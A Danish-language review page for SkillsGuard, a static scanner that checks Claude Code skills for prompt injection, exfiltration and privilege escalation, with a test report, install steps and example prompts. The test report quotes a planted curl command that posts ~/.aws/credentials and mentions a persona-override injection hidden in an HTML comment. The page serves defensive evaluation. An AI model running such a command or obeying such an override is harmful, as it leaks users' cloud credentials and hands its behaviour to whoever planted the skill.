SkillsGuard
Statisk scanner, der reviderer en SKILL.md for injektion, eksfiltrering og eskalering
Virker med opsætning
Hvad det gør
Driver SkillsGuard statisk scanner — 15 regelkategorier, der dækker prompt injection, eksfiltrering, command injection, persistens, privilege escalation, obfuskering og forsyningskæde — over en enkelt skill eller en hel skills-mappe, og formaterer derefter fundene til en alvorligheds-grupperet dom med en installér / installér-ikke anbefaling. Den afkoder base64 og andre obfuskerede blobs før matching, så payloads skjult i kodede strenge rapporteres med det afkodede bevis. Udløses af anmodninger som scan this skill, is this skill safe, eller audit my skills folder.
Testrapport
Afkod-først-motoren er den ægte vare: plantede en skill, hvis setup.sh skjulte `curl -X POST -d @<(cat ~/.aws/credentials)` inde i en base64 blob, og scanneren afkodede den og rapporterede eksfiltrering af legitimationsoplysninger, settings.json tilladelsesudvidelseslinjen og persona-override injektionen begravet i en HTML-kommentar — 17 fund på 16 ms, alle tre angreb fanget. Præcision er problemet. Rettet mod et ægte bibliotek med 278 installerede skills udsendte den 15.480 fund og scorede hele mappen 100/100 CRITICAL, og markerede 204 af 278 skills som HIGH-eller-værre; de to mest højlydte regler matcher `rm` og `sh` uden ordgrænser, så enhver markdown inline kode, der indeholder 'format' eller 'publish', rapporteres som command injection. En harmløs 14-linjers note-tagning skill, hvis eneste backtick var `--format markdown`, kom tilbage som MEDIUM med fem HIGH 'command injection' fund. Den er heller ikke på npm — SKILL.md alene gør intet, og du skal clone, npm install, build og npm link (eller tilslutte MCP-serveren), før skill'en har noget at kalde. Nyttig som en hurtig pre-install triage på en mistænkelig skill; stol ikke på dens mappe-niveau dom.
Testet: 2026-08-07 · Claude Code 2.x (agent harness)
Installation
git clone https://github.com/Teycir/SkillsGuard.git mkdir -p ~/.claude/skills cp -r SkillsGuard/skill ~/.claude/skills/skillsguard # scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link
Kommandoer og eksempelprompter
/skillsguardStatisk scanner, der reviderer en SKILL.md for injektion, eksfiltrering og eskalering
Skills udløses af almindelige forespørgsler — ingen kommandoer at huske. Efter installationen aktiverer prompter som disse skillen (på engelsk):
Can you scan this skill for prompt injection before I install it?Is this Claude Code skill safe to install, any red flags?Audit my whole ~/.claude/skills folder for exfiltration risks